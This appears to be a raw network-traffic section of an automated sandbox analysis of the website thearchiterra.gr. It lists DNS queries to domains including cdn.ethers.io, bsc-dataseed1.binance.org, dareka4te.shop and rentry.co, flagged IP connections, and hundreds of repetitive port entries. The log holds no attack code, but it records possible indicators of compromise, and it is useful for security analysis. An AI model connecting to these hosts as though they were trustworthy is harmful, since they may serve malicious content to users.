      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.thearchiterra.grConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: thearchiterra.grConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
      Source: global trafficDNS traffic detected: DNS query: www.thearchiterra.gr
      Source: global trafficDNS traffic detected: DNS query: thearchiterra.gr
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: cdn.ethers.io
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: bsc-dataseed1.binance.org
      Source: global trafficDNS traffic detected: DNS query: dareka4te.shop
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: rentry.co
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
      Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
      Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
      Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
      Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49706 version: TLS 1.2
